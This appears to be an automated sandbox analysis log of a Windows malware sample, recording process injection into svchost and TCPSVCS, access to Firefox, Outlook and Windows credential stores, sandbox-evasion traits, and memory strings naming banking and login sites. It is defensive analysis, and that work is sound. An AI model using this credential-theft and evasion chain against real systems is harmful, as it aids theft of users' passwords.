                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0035406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0035406B
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut48E4.tmpJump to behavior
                Source: xaqnaB0rcW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TCPSVCS.EXE, 00000005.00000003.1855291448.00000000007A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINp5zENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1857921204.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1855291448.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2601089290.00000000007F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: xaqnaB0rcW.exeVirustotal: Detection: 59%
                Source: xaqnaB0rcW.exeReversingLabs: Detection: 83%
                Source: unknownProcess created: C:\Users\user\Desktop\xaqnaB0rcW.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeProcess created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"Jump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeProcess created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: xaqnaB0rcW.exeStatic file information: File size 1223680 > 1048576
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: xaqnaB0rcW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HSxcaEmiOTH.exe, 00000004.00000002.2601053518.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, HSxcaEmiOTH.exe, 00000006.00000000.1736924979.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: xaqnaB0rcW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: xaqnaB0rcW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: xaqnaB0rcW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: xaqnaB0rcW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: xaqnaB0rcW.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036E01E LoadLibraryA,GetProcAddress,0_2_0036E01E
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00376B05 push ecx; ret 0_2_00376B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004122D5 pushad ; ret 2_2_004122FD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D286 pushad ; ret 2_2_0040D29D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032B0 push eax; ret 2_2_004032B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408306 push ds; retf 2_2_00408307
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404D95 push edx; retf 2_2_00404D96
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418FFD push esi; iretd 2_2_00418FFE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177A9 push ds; retf 80F3h2_2_004177B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E209AD push ecx; mov dword ptr [esp], ecx5_2_02E209B6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004123FB pushfd ; iretd 5_2_004123FC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004144F6 push ds; retf 80F3h5_2_00414500
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004205E4 push ss; retf 5_2_004205E8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00405053 push ds; retf 5_2_00405054
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040F022 pushad ; ret 5_2_0040F04A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0041B736 push edx; retf 5_2_0041B737
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0041D868 push ebp; ret 5_2_0041D86D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00401AE2 push edx; retf 5_2_00401AE3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00415D4A push esi; iretd 5_2_00415D4B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEB4CC push ebp; ret 5_2_00AEB4D4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AE95C2 push ecx; iretd 5_2_00AE95C7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AE4C01 push ebp; retf 5_2_00AE4C0C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AE2E0D push es; iretd 5_2_00AE2E14
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AE5E46 pushfd ; iretd 5_2_00AE5E47
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003B8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003B8111
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0036EB42
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0037123A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeAPI/Special instruction interceptor: Address: FD9D4C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: xaqnaB0rcW.exe, 00000000.00000003.1338506209.0000000001028000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000002.1351052607.000000000109F000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1338600645.000000000109F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEWindow / User API: threadDelayed 9717Jump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94807
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep count: 256 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep time: -512000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep count: 9717 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep time: -19434000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe TID: 7936Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00396CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00396CA9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003960DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003960DD
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003963F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003963F9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0039EB60
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F56F FindFirstFileW,FindClose,0_2_0039F56F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0039F5FA
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1B2F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1C8A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003A1F94
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0041C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0041C4E0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0036DDC0
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,11696492231]
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 164U99.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 164U99.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 164U99.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                Source: 164U99.5.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,1_O0
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 164U99.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 164U99.5.drBinary or memory string: discord.comVMware20,11696492231f
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ok.office365.comVMware20,1169649
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 164U99.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 164U99.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 164U99.5.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 164U99.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 164U99.5.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 164U99.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2601860000.000000000112F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                Source: 164U99.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 164U99.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 164U99.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 164U99.5.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: firefox.exe, 00000008.00000002.1966826815.000001DB7FAAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
                Source: 164U99.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeAPI call chain: ExitProcess graph end nodegraph_0-93448
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
